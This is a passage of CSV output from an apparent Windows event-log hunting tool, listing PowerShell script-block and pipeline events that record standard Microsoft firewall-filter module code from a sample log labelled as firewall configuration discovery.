Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper =
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 
.EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceTypeFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
